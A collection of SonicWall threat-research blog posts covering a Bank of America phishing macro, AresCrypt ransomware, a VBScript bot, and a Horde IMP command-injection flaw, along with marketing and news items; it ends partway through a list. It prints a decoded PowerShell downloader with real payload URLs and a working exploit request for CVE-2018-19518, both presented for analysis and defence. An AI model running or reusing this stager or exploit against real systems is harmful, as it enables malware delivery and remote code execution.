New Phishing campaign targets Bank of America Merrill Lynch customers

SonicWall has recently spotted a new Bank of America phishing campaign. The scam email claims to come from Bank of America Merrill Lynch and carries a malicious Excel attachment. The document contains VBA macros which, once enabled, download and run a Win32 Trojan payload.

Infection Cycle:

Phishing email remains one of the most effective attack vectors now that exploit kits are no longer attackers' preferred delivery method. In this campaign, Bank of America Merrill Lynch customers are targeted with a tailored lure. All of the fake emails come from the domain ‘bofamail.com’, not the real ‘bankofamerica.com’. The sender pretends to be a real Bank of America employee: an online profile exists under the same name for someone at a southern California branch, but the Newport branch address and phone number given in the email do not match it.

Upon opening the Excel attachment, a prompt appears with the message “If you have problems viewing/loading document content please select “Enable Editing” and then “Enable Content” button”. Once content is enabled, the macro downloads the malicious payload, which runs immediately.

The VBA project is password-protected.

After unlocking the VBA project by patching the document binary, we see the form (shown below) with encoded values in its fields.

VBA code:

The VBA code is heavily obfuscated to evade static signature detection. It contains the logic to reassemble the command string from the form fields shown above.


Shell Code:

The command string that is retrieved is pasted below. It carries a gzip-compressed, base64-encoded PowerShell script.

PowerShell:

After base64-decoding and then gunzipping the string above, we get the function below, which downloads the malicious payload from hxxp://gba-llp.ca/za.liva or, if that fails, from hxxp://jamaicabeachpolice.com/za.liva:

function <#release#> tisel([string] $stri1)   # the <# ... #> block comments are filler inserted to break signatures
{
 $tos1=1;
 try{
  # Fetch the URL straight to %TEMP%\tmp0281.exe; return 1 on success, 0 on any failure
  (new-object system.net.webclient <#exim#> ).downloadfile($stri1,$env:temp+'\tmp0281.exe');
 }
 catch{
  $tos1=0;
 }
return $tos1;
}

# Two fallback hosts; the scheme is prepended at call time and the loop stops at the first successful download
$men1=@('gba-llp.ca/za.liva','jamaicabeachpolice.com/za.liva');
foreach ($rix in $men1)
{
if(tisel('http://'+$rix) -eq 1){
break;
}
};

In summary: once the macro is enabled in the Excel document, it executes a shell command that launches a fileless PowerShell stager (the script is decoded and run in memory and never written to disk), and that stager downloads the payload to %TEMP% and executes it.
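To reproduce the decoding step above on any similar stager, here is an added Python example (not code from the original post or from the campaign) that base64-decodes and decompresses a packed blob and then pulls the download URLs and the drop path out of the recovered script. The packed input is constructed inside the block by compressing a copy of the decoded listing above; the function names and the handling of raw-DEFLATE blobs (which PowerShell's DeflateStream produces) are this example's own additions.

```python
import base64
import gzip
import re
import zlib

# Constructed sample: a downloader in the same shape as the decoded script in
# this post. Hosts, file names and variable names are copied from the post's
# listing so the extractor can be checked against it; the packed form is
# produced here by pack_stager(), not taken from the campaign's document.
SAMPLE_STAGER = r"""
function <#release#> tisel([string] $stri1)
{
 $tos1=1;
 try{
  (new-object system.net.webclient <#exim#> ).downloadfile($stri1,$env:temp+'\tmp0281.exe');
 }
 catch{
  $tos1=0;
 }
return $tos1;
}

$men1=@('gba-llp.ca/za.liva','jamaicabeachpolice.com/za.liva');
foreach ($rix in $men1)
{
if(tisel('http://'+$rix) -eq 1){
break;
}
};
"""


def pack_stager(script: str, raw_deflate: bool = False) -> str:
    """Compress, then base64: the order a macro applies before embedding the blob.

    raw_deflate=True strips the zlib header/trailer to mimic .NET DeflateStream output.
    """
    data = script.encode("utf-8")
    packed = zlib.compress(data)[2:-4] if raw_deflate else gzip.compress(data)
    return base64.b64encode(packed).decode("ascii")


def unpack_stager(blob: str) -> str:
    """Undo the packing: base64-decode first, then decompress.

    GZipStream output starts with the 1F 8B magic; DeflateStream emits raw
    DEFLATE with no header, which zlib only accepts with a negative window size.
    """
    raw = base64.b64decode(blob)
    if raw[:2] == b"\x1f\x8b":
        return gzip.decompress(raw).decode("utf-8", errors="replace")
    return zlib.decompress(raw, -zlib.MAX_WBITS).decode("utf-8", errors="replace")


BLOCK_COMMENT = re.compile(r"<#.*?#>", re.S)                 # <# ... #> filler used to break signatures
ARRAY_LITERAL = re.compile(r"@\(\s*((?:'[^']*'\s*,?\s*)+)\)")  # @('a','b') host arrays
SCHEME_PREFIX = re.compile(r"'(https?://)'\s*\+")              # scheme concatenated at call time
TEMP_DROP = re.compile(r"\$env:temp\s*\+\s*'([^']*)'", re.I)   # $env:temp+'\name.exe'


def extract_download_urls(script: str) -> list:
    """Rebuild full URLs from the host array and the scheme prepended in the loop."""
    clean = BLOCK_COMMENT.sub("", script)
    m = SCHEME_PREFIX.search(clean)
    scheme = m.group(1) if m else ""
    urls = []
    for arr in ARRAY_LITERAL.finditer(clean):
        urls.extend(scheme + host for host in re.findall(r"'([^']*)'", arr.group(1)))
    return urls


def extract_drop_path(script: str) -> str:
    """Return the on-disk path the downloader writes to, with $env:temp rendered as %TEMP%."""
    m = TEMP_DROP.search(BLOCK_COMMENT.sub("", script))
    return "%TEMP%" + m.group(1) if m else ""


def triage(blob: str) -> dict:
    """Decode a packed blob and pull out the indicators an analyst needs first."""
    script = unpack_stager(blob)
    return {"urls": extract_download_urls(script), "drop": extract_drop_path(script)}


if __name__ == "__main__":
    print(triage(pack_stager(SAMPLE_STAGER)))
```

The gzip-or-raw-DEFLATE branch matters in practice: stagers built with `IO.Compression.GZipStream` and `IO.Compression.DeflateStream` look identical after base64 but fail to decode if the wrong decompressor is tried first.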

The payload exhibits the following behaviors:

  • Stops and deletes the Windows Defender service
  • Creates a scheduled task that re-runs it every 10 minutes
  • Injects itself into svchost.exe, a trusted system process, to blend in
  • Communicates with the C&C server periodically

Threat Graph:

SonicWall Capture Labs Threat Research team provides protection against this threat with the following signatures:

  • GAV: Downloader.HWB (Trojan)
  • GAV: MalAgent.H_13330 (Trojan)

Hashes:

Email:
fed01a32dab1e3ab1eba4b2bfa542219a63b0777608717ad0ba5c5e0c66ec928
336cc2145bc27105906023089264593dcf9ddc99bb4a61af6760920efa97a6f4
f5e923ee210a88c6f02eac9c66ec116e49c964b6e6402124ed02462c69f46e0f
d0582f03ea259bc4d33aa77942b7a4d4ce8163e022ede4dcea9c81d802910321

Excel:
f22c2f747d77d57c14f6e81433691bd1b79f0fde1e111b4c4a90aac278b23654

Payload:
32c58040d3d6ec5305a1a0ebb48ba05aebe3ac2f905a7f152f32fc9170e16711

Payload URLs:
http://gba-llp.ca/za.liva
http://jamaicabeachpolice.com/za.liva

Bill Conner: How the UK Is Taking Malware Seriously

Bill Conner sat down with Information Age editor Nick Ismail to discuss global malware attack statistics, cross-border cybersecurity collaboration, the increasing need to inspect PDFs and Microsoft Office documents, and how all of these affect the dynamic U.K. political landscape.

Though malware attack data shows an increase in global attacks, the U.K. has experienced a decrease following the WannaCry ransomware outbreak in previous years.

Conner sees this as a positive change for the U.K. and stated via Information Age, “you guys were all over it” following the WannaCry attack and “most of the vendors in the U.K. and their customers put solutions in place to protect against multiple family variants of ransomware.”

While this is a positive change for the U.K., there is still work to be done globally and Conner says regardless of the often divided political climate, “there’s a good foundation for cyber collaboration across borders.”

“Right now, we need to focus on those PDFs and Office (files), the things you run in your business every day, because they can be exploited for IP and monetary gain. And you can’t even see it.”

Bill Conner
SonicWall President & CEO

In addition to urging governments to look toward political collaboration to tighten cybersecurity globally, Conner explained the majority of this change will come through the dedication of law enforcement.

“Law enforcement sharing is better than political sharing at the moment,” Conner told Information Age. “Public institutions, private organizations and different governments have got to collaborate. But, above all, we’ve got to have dedicated cyber law enforcement.”

While a global cybersecurity strategy may be down the road, Conner says there are places to focus on now to best secure governments, enterprises and SMBs.

What does Conner recommend an organization focus their cybersecurity strategy on?

“What I’m telling governments and enterprises is to forget side-channel exploits for the moment,” he said. “Right now, we need to focus on those PDFs and Office (files), the things you run in your business every day.”

One of the ways to mitigate these specific malware threats requires advanced technology, like SonicWall Capture Advanced Threat Protection (ATP) with SonicWall Real-Time Deep Memory Inspection (RTDMI™), to inspect and mitigate attacks in memory.

Read the rest of Conner’s recommendations and predictions in his interview with Information Age.

Network Security for K-12 School District Simplified with Powerful Firewall, Failover Capabilities

The Goffstown School District in New Hampshire supports nearly 4,000 students and staff. And one person oversees it all.

Running the IT department for an entire K-12 school district sounds like a challenge that few would take, but Goffstown School District IT director Gary Girolimon makes it look easy. Clearly, this is the result of years of experience and having sound networking tools available.

If the number of users doesn’t bother you, consider that all seven Goffstown School District buildings are part of a high-speed 10 Gbps dark-fiber wide-area network (WAN). At any point in the day, students can be downloading large numbers of dangerous files or stumbling upon harmful content that violates compliance regulations.

So, how do they handle that level of network complexity?

Girolimon deployed a SonicWall SuperMassive 9200 high-end firewall at the perimeter of his network. On it, he runs the SonicWall Comprehensive Gateway Security Suite, including content filtering to support CIPA compliance, which helps him manage the bandwidth to demanding applications and block harmful sites. The district also uses SonicWall Analyzer for real-time web traffic reporting.

“SonicWall gives us an integrated, cost-effective solution for our organization’s security needs,” said Girolimon. “It’s easy to administer, with a flexible UI, and the solution is super reliable. We have had no downtime attributable to our SonicWall firewall.”

Prior to deploying the SuperMassive at the edge, Girolimon deployed smaller SonicWall firewalls, ranging from NSA 2400s to 3600s, at each distributed building location. Those firewalls now provide failover service in case a dark fiber link to the network hub goes down, thereby extending their life and usefulness.

“SonicWall gives us an integrated, cost-effective solution for our organization’s security needs. It’s easy to administer, with a flexible UI, and the solution is super reliable.”

Gary Girolimon
IT Director
Goffstown School District

This flexibility and performance have allowed Girolimon to create a DMZ and bring servers in-house for better local access and to provide specific employees remote access to network assets — all with the confidence they are secure and protected.

By maintaining a single, primary firewall appliance with a failover firewall available as needed, Girolimon greatly simplified administration of firewall rules, app policies and VPN permissions. Integrated content filtering and VPN have simplified CIPA compliance.

Cost-Effective Network Security for K-12 School Districts

Today, more than 3,000 districts and schools rely on SonicWall to deliver secure remote and network access with school firewalls that enable educational institutions to realize the promise of technologically-savvy learning environments, in the classroom or while students are mobile.

Build of open source AresCrypt ransomware on github seen in the wild

The SonicWall Capture Labs Threat Research Team has recently discovered a build of an open source ransomware known as AresCrypt in the wild.  The source code is hosted on GitHub and is promised to be feature-packed.  In the author's own words:  “Well, Arescrypt is one of my first large-scale ransomware malware’s I’ve ever hand-crafted. So, I tried going all out for it, in hopes that it may be developed better in time.”

The author lists the following features for the malware:

  • All-in-one (encryption, verification, and decryption) of files.
  • Unique API calls to configurable server (standalone PHP script included)
  • Information stored in DAT (configuration) file – obfuscated too 😉
  • Extensive configuration file
  • Sandboxing capabilities

Infection Cycle:

The Trojan uses the following icon:

 

The file contains the following metadata:

 

Upon infection, the Trojan shows the following messagebox in order to ease suspicion:

 

The following audio message is played in the background:

 

The Trojan adds the following files to the filesystem:

  • C:\Users\<user>\files.txt
  • <run location>.arescrypt.dat (hidden file)

files.txt contains a list of files that were encrypted.

.arescrypt.dat contains the following data:

{"uniqueKey":"62vq6T5Y27aO","encKey":null,"encIV":null}

 

During the infection cycle, files are encrypted and given a .OOFNIK extension.  The author may have chosen this extension based on the fictional character Moishe Oofnik from Rechov SumSum, the Israeli version of the popular children's television series Sesame Street.

 

The Trojan obtains the victim's public IP address by querying ipinfo.io:

 

The Trojan reports the infection to a remote server:

 

After the audio message is played, the screen is locked with the following image:

The Trojan demands $40 in Bitcoin for file recovery.

 

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: AresCrypt.RSM (Trojan)
  • GAV: AresCrypt.RSM_2 (Trojan)

 

Cyber Security News & Trends – 02-01-19

This week, Collections #2-5 drop over 2 billion stolen logins, Bangladesh is suing a Philippines bank over cybertheft and SonicWall CEO Bill Conner discusses keeping up with the cybersecurity market.


SonicWall Spotlight

Could Cash-Rich Facebook Be Considering Acquisition Targets? – Real Money

  • SonicWall CEO Bill Conner is quoted by Real Money talking about Facebook’s need for cybersecurity acquisitions in a piece that speculates where the company might go next.

Are We Really Aware of What Mobile Malware Is? – VarIndia

  • SonicWall’s Debasish Mukherjee is interviewed as part of a panel discussing the mobile malware. He talks about the data SonicWall Capture Labs found on the Android platform throughout 2018.

SonicWall Aims to Build Brand in Critical Two Years – IT Europa

  • Bill Conner, CEO of SonicWall, lends his thoughts to IT Europa talking about the future of the fast-moving cybersecurity market and why not every security company is able to keep up.

Cyber Security News

Hackers are Passing Around a Megaleak of 2.2 Billion Records – Wired

  • After the leak of Collection #1 earlier in the year, Collections #2-5 continue the dump of hacked records, largely information that had been leaked previously.

Airbus Reports Breach Into Its Systems After Cyber Attack – Reuters

  • Airbus detected a cyberattack which resulted in a data breach of mostly employee data. It says the incident did not affect commercial operations.

What Was the Cybersecurity Impact of the Shutdown? – FCW

  • With the government shutdown over, the cybersecurity impact is still being worked out. FCW discusses the possible knock-on effects and how long they might last.

IT Spending Expected to Rise in 2019 Amid Shift to Cloud Services – Wall Street Journal

  • Forecasts put enterprise IT spending growth at 8.5% this year, with overall IT spending expected to rise 3.2%.

Too Few Cybersecurity Professionals Is a Gigantic Problem for 2019

  • There is a global gap of nearly 3 million cybersecurity positions. In the USA alone 314,000 jobs were posted in a one-year period between 2017 and 2018. Cybersecurity training itself is a new area and almost no cybersecurity professional over 30 today has a formal cybersecurity degree.

Bangladesh to Sue Philippine Bank Over $81M Cyber Heist – Security Week

  • A digital heist in 2016 led to the successful theft of $81 million from the Bangladesh central bank’s account with the US Federal Reserve. Bangladesh is now attempting to retrieve the funds by suing the Philippines bank that facilitated the transfer. The Federal Reserve denies that it was hacked.

Massive DDoS Attack Generates 500 Million Packets per Second – Dark Reading

  • A DDoS attack on GitHub in 2018 made headlines as the biggest ever, but it was only a quarter of the size of the attack stopped earlier this month.

Cryptocurrency Thefts, Scams Hit $1.7 Billion in 2018: Report – Reuters

  • Cryptocurrency theft rose 400 percent in 2018, with up to $1.7 billion stolen by the end of the year. $950 million of this was theft from cryptocurrency exchanges and digital wallets.


In the Field: Real-World Success with SonicWall Overdrive 2.0

Effectively marketing and selling managed service provider (MSP) services can be a real uphill battle for many organizations. The competition is fierce and positioning your organization’s services or competitive advantages isn’t easy.

For many MSPs and MSSPs, the responsibility of envisioning, designing, developing and maintaining effective marketing materials falls on the shoulders of the sales team or the senior leadership team. But they don’t always have the time or skill to execute what’s needed to cut through the cacophony of marketing noise.

Fortunately, SonicWall has alleviated much of this burden.

SonicWall Overdrive 2.0 is a remarkable resource stocked with modern, appealing and relevant content to help MSPs and MSSPs generate demand and close more business.

If you haven’t spent time in Overdrive 2.0, you’re missing out; there is an incredibly diverse set of resources to assist and even automate things like email blasts, social media, thought-leadership content and promotional material.

In my experience, there are three foundational best practices you should implement as an MSP or MSSP, especially when you’re scratching and clawing for sales in the competitive cybersecurity landscape.

Set Your Goals

Let me take you back a few years. As SonicWall’s FY2016 drew to a close, ProviNET scheduled a meeting with our SonicWall territory account manager (TAM). He really challenged us to set a goal for FY2017 to move up a level in our SonicWall SecureFirst partnership.

He was right. We had been a SonicWall ‘Silver’ partner for several years and with our FY2016 sales, we weren’t too far away from being eligible for ‘gold’ if we also achieved some additional sales and technical certifications. But we weren’t quite sure how to push ourselves across that next threshold.

Our TAM had the answer. He turned us on to SonicWall Overdrive 2.0, the company’s fully automated partner marketing engine designed specifically around key go-to-market themes, campaigns and resources. He assured us that if we invested a little bit of time into marketing, we’d be able to elevate our partnership. With that, our goal was set: we were going to become a SonicWall gold partner in 2017.

SonicWall Overdrive offers turnkey campaigns SecureFirst partners can launch to build awareness, create pipeline and close deals.

Develop Your Strategy

Without a strategy, marketing is a lot like throwing bubble gum at the wall and seeing if it sticks. Spend some time intentionally thinking through four things:

  • Who your organization will target
  • What methods it will use to target
  • How often you will target potential buyers
  • How you will track and measure your efforts

If you have a dedicated marketing person, consider developing a multi-faceted campaign that the marketing team can execute. The campaign should include multiple touchpoints across a variety of channels. Overdrive is an easy-to-use tool, regardless of your resources, to reach your customers and prospects.

At a basic level, consider sending an email blast, posting on social media, sending a postcard, publishing whitepapers or case studies on the website, and using the Overdrive 2.0 content to educate customers and prospects.

SonicWall Overdrive 2.0 packages content and resources partners can leverage as part of one-off marketing efforts or fully integrated campaigns.

We had success using much of the Overdrive 2.0 content to point people to a dedicated SonicWall landing page within our own website where prospects could fill out a form and be contacted to learn more. And because these campaigns were launched by us, they were contacting us for more information (i.e., we received the lead and the opportunity to either nurture the prospect or close the deal).

Even sophisticated customers will not always be able to grasp the full advantages and capabilities of the Capture Cloud platform after just one touchpoint. It will be important to educate them on the advantages that the orchestration of these security products and services can provide to them.

But don’t forget about existing customers here, too. For us, the Overdrive 2.0 marketing content was a motivator to look across our existing SonicWall customer install base and look for opportunity to add additional services like the SonicWall Capture Advanced Threat Protection (ATP) sandbox service or secure email solutions.

Analyze Your Results

There is remarkably valuable information in marketing analytics reports. Whether you use a marketing automation tool, a website analytics engine or even just campaign reporting from Overdrive, it can help your sales staff be more efficient and effective in their sales efforts.

Our team uses a combination of HubSpot, Google Analytics, and the email reports from Overdrive 2.0 to glean insights into customers and prospects who may or may not have an interest in particular marketing campaigns.

We can track if an individual opened an email four times, clicked the link to our site, or engaged with us on social media on several occasions to gauge if there is a genuine interest. Our sales team then makes those prospects and customers the focus of contact for more direct conversations, and that often leads to closed deals.

Bear in mind, the goal of marketing is not to sell. These are two very different activities. For ProviNET, we define marketing as a process where we:

Our sales team has a very different, yet complementary, function:

SonicWall Overdrive 2.0 has been an invaluable resource for our team to really accomplish all four of our marketing objectives. By using the assets available in Overdrive 2.0, we’re providing meaningful education about the necessity and value of security products and services. We can position those assets in a compelling and efficient manner to provide the most value to our prospects and customers.

Even better? All registered SonicWall SecureFirst Silver, Gold and Platinum partners in good standing are eligible to use the SonicWall Overdrive 2.0 platform, at no cost, through the SonicWall SecureFirst Partner Portal.


About ProviNET

ProviNET is a SonicWall SecureFirst Gold Partner. For nearly three decades, ProviNET has delivered trusted technology solutions for senior living and post-acute healthcare organizations. Whether it’s a single project or full-time onsite work, ProviNET designs and implements customized solutions so healthcare organizations can focus on core services.

ProviNET’s tight-knit group of experienced, industry-certified personnel are focused on customer satisfaction. They are a reputable organization, fulfilling immediate IT needs and helping plan for tomorrow. They are ready to put their extensive knowledge to work for healthcare, developing strategies and solving challenges with the latest technology.

To learn more about ProviNET, please visit www.provinet.com.

EdgeScheduler: A VBScript Bot in action

Amid the race toward ever more complex malware, simple malware can still be very destructive. SonicWall has spotted a VBScript malware that looks unsophisticated but whose capabilities are no lesser than those of more prominent malware bots.

The VBScript malware, carrying a genuine-looking file name, is distributed inside an archive file.


Figure 1

Decryption Mechanism

This VBScript file works as a loader for the actual VBScript Bot, which is decrypted in memory and then executed, as shown below:


Figure 2

The decryption logic being used in this particular malware is explained below:


Figure 3

File Level Activity

The VBScript Bot contains a base64-encoded PowerShell script, which it decodes and drops into the %TEMP% directory. The PowerShell script reads the user's saved credentials from the “Credential Locker” through the Windows.Security.Credentials.PasswordVault class, which is available on Windows 8 and later. The stolen data is then sent to the C&C server.


Figure 4

The Bot then generates a random id 25 characters long. The random id is first saved into the registry, as shown below:


Figure 5

Later, the random id is sent to the C&C server along with the other stolen data.

The Bot creates a sub-directory named “Edge” under %APPDATA%, copies the wscript.exe executable from the system directory into it under the name “amsi.dll” (an executable masquerading as a DLL), and drops a copy of itself in the same directory, using the random id as the filename.


Figure 6

The Bot is then executed from the “Edge” directory through this renamed amsi.dll with two parameters, as shown below:


Figure 7

The Bot checks whether it is running from the “Edge” directory with two arguments; if so, it enumerates processes to see whether “amsi.dll” is already running, as shown below:


Figure 8

If no “amsi.dll” process is found, it adds a Run entry to the registry for persistence, as shown below:


Figure 9
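A hunt for the persistence and masquerading artefacts described above, written as an added Python example rather than anything from the post or from the bot: it scores process-creation records against the traits the post lists (an executable named amsi.dll running from %APPDATA%\Edge, a script named after a 25-character id, exactly two parameters, and a Run key pointing at the copy). The event records, user name and parameter values are constructed for the example; the bot's actual command line is not reproduced in the post, so the argument layout is an assumption.

```python
import ntpath
import re
from dataclasses import dataclass, field
from typing import List

# Constructed process-creation records in the shape of Sysmon Event ID 1 or
# EDR telemetry. They are sample data written for this example, not events
# from the post.
@dataclass
class ProcEvent:
    image: str                                            # full path of the executable that started
    command_line: str                                     # its command line
    run_values: List[str] = field(default_factory=list)   # HKCU\...\Run values seen on the host


RANDOM_ID = re.compile(r"^[A-Za-z0-9]{25}$")   # the post: a 25-character random id
TOKEN = re.compile(r'"([^"]*)"|(\S+)')         # quoted or bare command-line tokens


def split_cmdline(cmdline: str) -> List[str]:
    """Split a Windows command line into tokens, honouring double quotes."""
    return [a or b for a, b in TOKEN.findall(cmdline)]


def edgescheduler_indicators(ev: ProcEvent) -> List[str]:
    """Return the EdgeScheduler traits present in one event (empty list = nothing suspicious)."""
    hits = []
    low = ev.image.replace("/", "\\").lower()
    # wscript.exe copied to %APPDATA%\Edge\amsi.dll: a process whose image is
    # named like a DLL, living under an Edge directory in the roaming profile.
    if (ntpath.basename(low) == "amsi.dll" and "\\appdata\\" in low
            and ntpath.basename(ntpath.dirname(low)) == "edge"):
        hits.append("process image is %APPDATA%\\Edge\\amsi.dll")
    args = split_cmdline(ev.command_line)
    # wscript's first argument is the script; the bot names its copy after the random id.
    if len(args) >= 2 and RANDOM_ID.match(ntpath.splitext(ntpath.basename(args[1]))[0]):
        hits.append("script name is a 25-character random id")
    if len(args) == 4:   # image, script, and the two parameters the post describes
        hits.append("script launched with exactly two parameters")
    if any("\\edge\\amsi.dll" in v.lower() for v in ev.run_values):
        hits.append("Run key persistence points at Edge\\amsi.dll")
    return hits


APPDATA = r"C:\Users\alice\AppData\Roaming"   # constructed profile path
SAMPLE_EVENTS = [
    # Constructed EdgeScheduler-style launch; "p1 p2" stand in for the two unknown parameters.
    ProcEvent(
        image=APPDATA + r"\Edge\amsi.dll",
        command_line=f'"{APPDATA}\\Edge\\amsi.dll" "{APPDATA}\\Edge\\aB3dE5fG7hI9jK1lM3nO5pQ7r" p1 p2',
        run_values=[f'"{APPDATA}\\Edge\\amsi.dll" "{APPDATA}\\Edge\\aB3dE5fG7hI9jK1lM3nO5pQ7r" p1 p2'],
    ),
    # Ordinary logon script run by the real wscript.exe: should score nothing.
    ProcEvent(
        image=r"C:\Windows\System32\wscript.exe",
        command_line=r'"C:\Windows\System32\wscript.exe" "\\fileserver\netlogon\logon.vbs" /nologo',
    ),
]


def triage(events: List[ProcEvent]) -> List[List[str]]:
    """Score every event; the caller decides how many traits justify an alert."""
    return [edgescheduler_indicators(ev) for ev in events]


if __name__ == "__main__":
    for ev, hits in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print(ev.image, "->", hits or "clean")
```

The first trait alone (a running process whose image name ends in .dll under a user-writable directory) is worth alerting on by itself; the others raise confidence that it is this bot rather than some other renamed interpreter.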

Command & Control (C&C) Server connections

The Bot establishes a connection with the C&C server and sends the following data from the victim's machine:

  • Operating system information.
  • Username and computer name.
  • Anti-Virus product information.
  • RAM, CPU and Virtual Machine Information.
  • Randomly generated id.
  • Processor architecture.



Figure 10

The code snippet that sends the above information from the victim's machine to the C&C server is shown below:

Figure 11

If the response is longer than 4 bytes, the Bot treats the C&C server as live; otherwise it tries to reach another server. For a live server, the Bot parses the response into a command and its arguments, which are separated by “!”. At the time of analysis, the C&C server sent the “nope” command, meaning no operation.
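The response handling described above, modelled as an added Python example (not the bot's code): liveness is decided by the more-than-4-bytes rule, then the reply is split on “!” into a command and its arguments, and the server list is walked until one reply passes. The hostnames and the “nope!\r\n” framing are assumptions made to drive the example, since the post does not show the raw reply; note that a bare “nope” is exactly 4 bytes and would fail the bot's own liveness check.

```python
from typing import Callable, Dict, List, Optional, Tuple

LIVE_THRESHOLD = 4   # the post: a reply longer than 4 bytes means the server is up
SEPARATOR = "!"      # command and arguments are "!"-delimited


def parse_response(data: bytes) -> Optional[Tuple[str, List[str]]]:
    """Apply the bot's two checks: liveness by length, then split into (command, args).

    Returns None when the reply is too short, which is what makes the bot move on
    to its next server.
    """
    if len(data) <= LIVE_THRESHOLD:
        return None
    fields = data.decode("utf-8", errors="replace").strip().split(SEPARATOR)
    return fields[0], [f for f in fields[1:] if f]


def find_live_server(servers: List[str], fetch: Callable[[str], bytes]):
    """Walk the server list in order and stop at the first reply that parses."""
    for server in servers:
        parsed = parse_response(fetch(server))
        if parsed is not None:
            return server, parsed
    return None, None


def handle(command: str, args: List[str]) -> str:
    """Dispatch a parsed command; "nope" is the only command the post names."""
    if command == "nope":
        return "no operation"
    # The post does not list the remaining commands, so anything else is reported, not acted on.
    return f"unhandled command {command!r} with {len(args)} argument(s)"


# Constructed replies. A bare "nope" is exactly 4 bytes and fails the bot's own
# liveness test, so the real reply must carry framing beyond the word; the
# "nope!\r\n" form below is an assumed framing used only to drive the example.
CANNED_REPLIES: Dict[str, bytes] = {
    "c2-a.example": b"",           # no data: treated as down
    "c2-b.example": b"nope",       # 4 bytes: still treated as down
    "c2-c.example": b"nope!\r\n",  # 7 bytes: live, parses to ("nope", [])
}


def fake_fetch(server: str) -> bytes:
    """Stand-in for the HTTP request so the example runs offline."""
    return CANNED_REPLIES.get(server, b"")


def demo() -> str:
    server, parsed = find_live_server(list(CANNED_REPLIES), fake_fetch)
    if parsed is None:
        return "no live server"
    command, args = parsed
    return f"{server}: {handle(command, args)}"


if __name__ == "__main__":
    print(demo())
```

The same parser is useful on the defensive side: run it over replies captured from a sandbox session to see which command the server actually issued rather than eyeballing the raw bytes.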

The Bot is capable of performing the following actions based on the commands received from the C&C server:


The Bot also contains code to upload files from the victim's machine to the C&C server, but that code is not exercised in this sample. This suggests the Bot is still in development and may gain more capabilities in future.

This threat was proactively detected by Capture ATP w/RTDMI engine.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: EdgeScheduler.DEC (Trojan)

Hackers actively scanning for Horde IMP Vulnerability

SonicWall Capture Labs Threat Research team has recently observed attackers actively exploiting a Horde IMP vulnerability. Over 3,000 firewalls have been hit with 20,000+ requests in the last two days. A successful exploit allows the attacker to execute arbitrary shell commands on the vulnerable system.

Horde IMP:

Horde Groupware Webmail Edition is a free, enterprise-ready, browser-based communication suite. It offers applications such as the Horde IMP email client, a groupware package (calendar, notes, tasks, file manager), a wiki, and time and task tracking software. It is written in PHP and provides the elements required for rapid web application development.

Horde IMP (Internet Messaging Program), an application bundled with Horde Groupware, is one of the most popular and widely deployed open source webmail applications. It provides universal, web-based access to IMAP and POP3 mail servers from any browser (desktop, mobile, tablet or text-only).

Vulnerability:

Horde IMP exposes an unauthenticated debug page with a form that permits IMAP requests to arbitrary hosts. The page lives at “http://horde_path/imp/test.php”. By chaining this page with CVE-2018-19518 in PHP's imap_open function, an unauthenticated remote attacker can execute arbitrary shell commands on the targeted system.


Fig 1: Snapshot from an active webmail that exposes the debug page

CVE-2018-19518:

Internet Message Access Protocol (IMAP) is an Internet standard protocol used by email clients to retrieve messages from a mail server over a TCP/IP connection. PHP's IMAP extension provides a set of functions for this out of the box. The vulnerability exists in the ‘imap_open’ function, which opens an IMAP stream to a mailbox: it does not properly filter mailbox names before passing them to the rsh or ssh commands. If rsh and ssh functionality is enabled and the rsh command is a symbolic link to the ssh command, an attacker can exploit this by supplying a malicious IMAP server name containing a -oProxyCommand argument. A successful exploit lets the attacker sidestep PHP's disabled exec-style functions (for example a disable_functions list in php.ini) and run arbitrary shell commands on the targeted system with the privileges of the web server process.

Exploit:

In this exploit request, a malicious IMAP server name containing a -oProxyCommand option is sent to the targeted system (placeholder values for the target, headers and command are shown so the snippet runs as written):

import base64
import requests

target = "http://horde_path/imp/test.php"    # the exposed debug page (placeholder path)
new_headers = {"User-Agent": "Mozilla/5.0"}   # placeholder headers
anyname = "mail.example"                      # any host name; it only prefixes the injected option
cmd = base64.b64encode(b"id").decode()        # placeholder command; base64 because the payload pipes it through base64 -d
res = requests.post(target, headers=new_headers, data=[('server', anyname + ' -oProxyCommand=echo$IFS$()' + cmd + '|base64$IFS$()-d|sh}'),
('port', '143'),
('user', 'a'),
('passwd', 'a'),
('server_type', 'imap'),
('f_submit', 'Submit')
])

The server name anyname + ‘ -oProxyCommand=echo$IFS$()’ + cmd + ‘|base64$IFS$()-d|sh’ is passed to the ssh command without input validation. The $IFS$() sequences stand in for spaces (the shell's internal field separator followed by an empty command substitution) so the value survives word-splitting, and ProxyCommand makes ssh run the given command, so the base64-decoded payload executes in the context of the web server user.
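For defenders watching for this traffic, here is an added Python example (not from the post or from any SonicWall signature) that flags POSTs to /imp/test.php whose server field carries an injected ssh option, after folding the $IFS$() spacing trick back into real spaces. The sample requests, hostnames and the base64-encoded “id” command are constructed for the example; the real campaign's commands are not shown in the post.

```python
import re
from typing import List, Tuple
from urllib.parse import parse_qs, urlencode, urlparse

# The server field is spliced into an rsh/ssh command line by the IMAP c-client,
# so whitespace followed by "-" means the value is being read as an ssh option.
IFS_EVASION = re.compile(r"\$IFS(\$\(\))?", re.I)   # $IFS / $IFS$() stand in for a space
OPTION_INJECT = re.compile(r"(^|\s)-[A-Za-z]")      # "-o...", "-F...", etc. in option position


def normalise(value: str) -> str:
    """Fold the $IFS spacing trick back into real spaces before pattern matching."""
    return IFS_EVASION.sub(" ", value)


def is_imp_test_page(path: str) -> bool:
    """The debug page can sit under any Horde prefix, so match on the trailing path."""
    return urlparse(path).path.lower().rstrip("/").endswith("/imp/test.php")


def is_imap_open_exploit(method: str, path: str, body: str) -> bool:
    """True for a POST to IMP's debug page whose server field injects ssh options."""
    if method.upper() != "POST" or not is_imp_test_page(path):
        return False
    params = parse_qs(body, keep_blank_values=True)
    for server in params.get("server", []):
        value = normalise(server)
        if OPTION_INJECT.search(value) or "proxycommand" in value.lower():
            return True
    return False


# Constructed requests (method, path, urlencoded body) in the shape a WAF or a
# body-logging proxy would hand over. "aWQ=" is base64 for "id", chosen for the sample.
SAMPLE_REQUESTS: List[Tuple[str, str, str]] = [
    ("POST", "/horde/imp/test.php", urlencode([
        ("server", "mail.example -oProxyCommand=echo$IFS$()aWQ=|base64$IFS$()-d|sh}"),
        ("port", "143"), ("user", "a"), ("passwd", "a"),
        ("server_type", "imap"), ("f_submit", "Submit"),
    ])),
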